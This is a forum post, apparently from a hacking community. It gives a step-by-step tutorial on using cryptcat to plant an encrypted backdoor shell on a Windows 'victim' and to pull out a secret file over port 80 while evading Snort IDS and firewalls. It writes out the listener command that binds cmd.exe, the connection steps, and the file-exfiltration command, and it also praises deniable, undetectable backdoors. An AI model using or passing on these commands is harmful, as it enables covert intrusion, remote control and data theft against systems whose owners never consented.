Staff member
May 15, 2017
Reaction score
Backdoor, backdoor (back door - "back door", literally "back door") - a defect in the algorithm that is intentionally embedded in it by the developer and allows you to get unauthorized access to data or remote control of the operating system and computer as a whole.

The main purpose of the backdoor is the secretive and fast access to data, in most cases - to encrypted and protected. For example, a backdoor can be embedded in an encryption algorithm for subsequent interception of a secure channel by an attacker.

Perfect backdoor
  • impossible to detect;
  • can be used repeatedly;
  • easy to deny - it looks like an error, and if found, the developer can refer to the fact that he made this error by accident and had no malicious intent;
  • We exploit only if we know the secret - only those who know how the backdoor is activated can use it;
  • protected from compromise by previous uses - even if the backdoor was discovered, it is impossible to establish who it was exploited by before, and what information the attacker took over;
  • difficult to repeat - even if the backdoor was found by someone, it will not be possible to use it in another code or in another device.
Creating a Backdoor with Cryptcat

Cryptcat allows us to communicate between two systems and encrypts communication between them using twofish - one of many excellent encryption algorithms.

In this tutorial we will introduce the popular netcat cousin, cryptcat (it’s actually much nicer and more exotic than a simple netcat).

Since twofish encryption is on par with AES encryption, this makes cryptcat almost bulletproof. Thus, IDS cannot detect harmful behavior even when its routes go through such ordinary HTTP ports 80 and 443.

Step 1 : Download Cryptcat

You can download and install cryptcat on the Windows system via this link .

Step 2: Open a listener on a Windows system.

We can open a listener on any system with a similar syntax as for netcat. In our case, we open the listener in the Windows 7 system on port 6996 and create a command shell.

cryptcat -l -p 6996 -e cmd.еxе


-l means "open listening"

-p 6996 means "to place the listener in port 6996"

-e cmd.exe means "start a command shell for connection"

Step 3 : Open the Snort and other IDS

Now, let's run Snort IDS on type another system that will connect to the Windows system to see if the encryption is capable of blinding the IDS, leaving our backdoor invisible to such security devices.



Step 4 : Connect to the Windows system with Cryptcat

Cryptcat is installed by default on BackTrack , so we do not need to download and install it. In addition, it is located in the / bin directory, so we can access it from any directory.

Now let's connect to the Windows 7 cryptcat system from our BackTrack system and see if we can make an encrypted backdoor connection that is almost impossible to detect.

cryptcat 6996


As you can see, we are connected to the Windows 7 system and got a command shell from the Win 7 system! This gives us considerable control over this system, but not total control, because the command shell has limited capabilities.

Step 5 : Check the Snort logs and alerts

This type of attack (passing the command shell over the network) is easily detected using Snort or other IDS when the connection is not encrypted. Snort rules will alert the sysadmin that cmd.ex the shell is going through a network connection and they are likely to do something to keep you from using this command shell. With an encrypted connection available with cryptcat, this connection is almost impossible to detect.

Let's go back and check the logs and alerts in Snort. If we were successful in avoiding IDS, then we should not see a warning about moving the command shell around the network. We can check our logs by going to / var / snort / alerts and see if there are any signals caused by our connection to the Windows machine (we usually have to find a warning).

kwritе /var/snort/alerts


As you can see, we have succeeded. We were able to connect to the Windows system without attracting the attention of any security system!

Step 6 : Send Crypcat through port 80 to avoid the firewall.

Although we have successfully created an encrypted backdoor on the victim's system, a close security administrator will notice that the port is open (6996). This will most likely initiate some kind of security administrator action to limit our access. In addition, on systems with a good system administrator and a good firewall, this port is likely to be blocked by a firewall.

For any network, in order to be able to communicate on the Internet, you most likely need to keep ports 80 and 443 open, but also, perhaps, 25, 53 and 110. Because normal Internet traffic passes unencrypted through port 80, which is almost always open then a slight increase in traffic is hardly noticed.

Now that we have successfully used cryptcat, we will send it through port 80 with all the rest of the Internet traffic. Although it is encrypted, it will look like any binary data transmitted in a line. Therefore, it will be almost impossible for security devices to detect it, since they must always allow traffic through port 80, and traffic is encrypted and IDS will not be able to “see” its contents.

Here we will move the file from the victim’s system called topsecret.txt to our attacking system without identifying it with any security device. This time, instead of sending the command shell through the network, we will send a completely secret file called topsecret.txt through our encrypted connection. We can do this by typing in the Windows command line:

cryptcat -l -p 80 < topsecret.txt


-l means "open listening"

-p 80 means "open listening on port 80"

<means "to send the file through this listener"

Step 7 : Connect to the listener

Now let's connect to the victim's system and pull out a top-secret file. All you need to do is connect to the listener by dialing the cryptcat, the IP address of the victim system and the port number of the listener.

cryptcat 80


As you can see, the file went through our connection successfully!

Step 8: Check the alert file

Let's check our Snort log files again for evidence that our IDS did not detect this traffic from the top-secret file.

kwrite /var/snort/alerts


As you can see, our top-secret file moved through port 80 under the noses of the system administrators, IDS and firewall without a trace!

Cryptcat is a great little tool for moving data outside the victim’s system through normally open ports without being detected by any security devices.
Top Bottom